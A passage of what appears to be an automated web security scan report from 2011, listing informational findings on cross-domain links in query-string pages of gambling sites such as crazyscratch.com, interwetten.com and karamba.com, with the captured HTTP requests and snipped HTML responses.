ta (a member of the EU since May 2007). The Company's registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.35. http://www.info.crazyscratch.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Promotions.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /Promotions.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<br /><a href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/WeeklySchedule_ENG.html" target="_blank" >
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_header.jpg" /></a>
...[SNIP]...
real chance to win the Jackpot, you've come to the right place!
Check out our daily promotions to see what incredible offers, tournaments and prizes we've got in store for you!
<a class="PromotionPageLinks" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/WeeklySchedule_ENG.html" target="_blank">Click here to see our upcoming promotions</a>
...[SNIP]...
<a href="BonusPolicy.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/5FreePromotion_ENG_GBP.jpg" /></a>
...[SNIP]...
<a href="BonusPolicy.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_midle_right.jpg" /></a>
...[SNIP]...
<a href="InviteFriend.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_bottom_left.jpg" /></a>
...[SNIP]...
<a href="PlayersClub.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_bottom_right.jpg" /></a>
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company's registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.36. http://www.info.crazyscratch.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Responsible.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /Responsible.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:52 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:52 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:52 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61106


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<br />

<a class="ContentLinks" href="http://www.gamblingtherapy.org/?ReferrerID=311" target="_blank">
Gambling Therapy Helpline
</a>
...[SNIP]...
<br />
<a class="ContentLinks" href="http://www.gamblersanonymous.com" target="_blank">
Gamblers Anonymous
</a>
...[SNIP]...
<br />
<a class="ContentLinks" href="http://www.igcouncil.org/aboutus_readmore.php?id=251" target="_blank">
Helping Hand/IGC
</a>
...[SNIP]...
<br />
<a class="ContentLinks" href="http://www.gambleaware.co.uk/" target="_blank">
Gambleaware (UK)
</a>
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.37. http://www.info.crazyscratch.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Terms.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /Terms.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:38 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:38 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:38 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:38 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117962


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.38. http://www.info.crazyscratch.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /UnderAge.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /UnderAge.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:48:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54276


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.39. https://www.interwetten.com/en/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/default.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /en/default.aspx?home=1 HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:39:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:39:59 GMT
Content-Length: 34108
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<hea
...[SNIP]...
<div class="content">


<img src="https://intrwetten.hs.llnwd.net/e1/images/26744.jpg" id="SplashPanel1_ContentRepeater_ctl00_ctl00_ctl02_ImagePlain" onclick="document.location =&#39;/games/default.aspx&#39;;" style="cursor:pointer;" />


<h3>
...[SNIP]...
<div class="content">


<img src="https://intrwetten.hs.llnwd.net/e1/images/25446.jpg" id="SplashPanel1_ContentRepeater_ctl01_ctl00_ctl02_ImagePlain" onclick="document.location =&#39;/sportsbook/registrationform.aspx&#39;;" style="cursor:pointer;" />


<p>
...[SNIP]...
<div class="content">


<img src="https://intrwetten.hs.llnwd.net/e1/images/14548.jpg" id="SplashPanel1_ContentRepeater_ctl02_ctl00_ctl02_ImagePlain" onclick="document.location =&#39;/SportsBook/Default.aspx&#39;;" style="cursor:pointer;" />


<p>
...[SNIP]...
<div class="content">


<img src="https://intrwetten.hs.llnwd.net/e1/images/21186.jpg" id="SplashPanel1_ContentRepeater_ctl03_ctl00_ctl02_ImagePlain" onclick="document.location =&#39;/Casino/Content.aspx?ln=Promotions&amp;tid=&amp;cat=50FreeSpins&amp;st=Casino&#39;;" style="cursor:pointer;" />


<p>
...[SNIP]...
<div class="content">


<img src="https://intrwetten.hs.llnwd.net/e1/images/26754.jpg" id="SplashPanel1_ContentRepeater_ctl04_ctl00_ctl02_ImagePlain" onclick="document.location =&#39;/scratch/default.aspx&#39;;" style="cursor:pointer;" />


<p>
...[SNIP]...
<li style="width:210px;height:160px;">


<img src="https://intrwetten.hs.llnwd.net/e1/images/23270.jpg" id="PanelRotator1_rptItems_ctl00_ctl00_ctl01_ImagePlain" onclick="Global.OpenPopup(&#39;/Casino/game.aspx?CasinoId=1&amp;GroupID=4&amp;GameID=mpblackjack&#39;, &#39;&#39;, 1020, 600, 1, 1, 0);" style="cursor:pointer;" />


</li>
...[SNIP]...
<li style="width:210px;height:160px;">


<img src="https://intrwetten.hs.llnwd.net/e1/images/23271.jpg" id="PanelRotator1_rptItems_ctl01_ctl00_ctl01_ImagePlain" onclick="Global.OpenPopup(&#39;/Casino/game.aspx?CasinoId=1&amp;GroupID=10&amp;GameID=eldorado&#39;, &#39;&#39;, 1020, 600, 1, 1, 0);" style="cursor:pointer;" />


</li>
...[SNIP]...
<li style="width:210px;height:160px;">


<img src="https://intrwetten.hs.llnwd.net/e1/images/23276.jpg" id="PanelRotator1_rptItems_ctl02_ctl00_ctl01_ImagePlain" onclick="Global.OpenPopup(&#39;/Casino/Game.aspx?casinoId=2&amp;gameId=495&amp;groupId=13&amp;StartGameName=LOTRthefellowship&amp;GameName=Lord%20of%20The%20Rings&#39;, &#39;&#39;, 1020, 600, 1, 1, 0);document.location =&#39;/Casino/Default.aspx&#39;;" style="cursor:pointer;" />


</li>
...[SNIP]...
<li style="width:210px;height:160px;">


<img src="https://intrwetten.hs.llnwd.net/e1/images/23278.jpg" id="PanelRotator1_rptItems_ctl03_ctl00_ctl01_ImagePlain" onclick="Global.OpenPopup(&#39;/Casino/Game.aspx?CasinoId=2&amp;GroupID=13&amp;GameID=217&amp;StartGameName=RubyPremierRoulette&amp;GameName=Premier%20Roulette&#39;, &#39;&#39;, 1020, 600, 1, 1, 0);document.location =&#39;/Casino/Default.aspx&#39;;" style="cursor:pointer;" />


</li>
...[SNIP]...
<li style="width:210px;height:160px;">


<img src="https://intrwetten.hs.llnwd.net/e1/images/23281.jpg" id="PanelRotator1_rptItems_ctl04_ctl00_ctl01_ImagePlain" onclick="Global.OpenPopup(&#39;/Casino/game.aspx?CasinoId=1&amp;GroupID=10&amp;GameID=secretcode&#39;, &#39;&#39;, 1020, 600, 1, 1, 0);" style="cursor:pointer;" />


</li>
...[SNIP]...
</a>
<a class="sbadgeThawte" href="https://www.thawte.com/" onclick="Global.OpenPopup('https://www.thawte.com/', 'Security', 755, 510, true, true, true, true);return false;"></a>
...[SNIP]...

18.40. http://www.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Home.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:01 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:01 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:01 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44671


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/Karamba/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/Karamba/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="ContactUsPopUp('ContactUsMail','',870,660);" href="#" title="Karamba.com online slots support"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/Home/ContactUs_ENG.gif" border="0" alt="Karamba.com online slots support" /></a>
...[SNIP]...
<td style="padding-left: 10px; padding-right: 3px"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/login_lang_separator_line.jpg" border="0" /></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td class="TopMenuItem"><a href="https://www.aspireaffiliates.com/?CMI=1" target="_blank">Affiliates</a>
...[SNIP]...
<td><img src="http://download.neogames-tech.com/Brands/Karamba/Website/Home/WinnersQuotes_ENG.gif" border="0" alt="Try your luck with free online slots" /></td>
...[SNIP]...
<td><img src="http://download.neogames-tech.com/Brands/Karamba/Website/Home/Games_ENG.jpg" border="0" alt="No download with free Online casino slots" /></td>
...[SNIP]...
<td><img src="http://download.neogames-tech.com/Brands/Karamba/Website/Home/LatestWinners_ENG.gif" border="0" alt="Big slots and games winners" /></td>
...[SNIP]...
</a>
|
<a href="https://www.aspireaffiliates.com/?CMI=1" target="_blank">Affiliates</a>
...[SNIP]...
<div class="BottomImageMap">
<img id="ctl00_cphFooter_objPageFooter_footerUpperStripImageMap" src="http://download.neogames-tech.com/Brands/Karamba/Website/General/footerUpper.gif" style="border-width:0px;" />
<img id="ctl00_cphFooter_objPageFooter_footerBottomStripImageMap" src="http://download.neogames-tech.com/Brands/Karamba/Website/General/footerBottom.gif" usemap="#ImageMapctl00_cphFooter_objPageFooter_footerBottomStripImageMap" style="border-width:0px;" /><map name="ImageMapctl00_cphFooter_objPageFooter_footerBottomStripImageMap" id="ImageMapctl00_cphFooter_objPageFooter_footerBottomStripImageMap">
...[SNIP]...
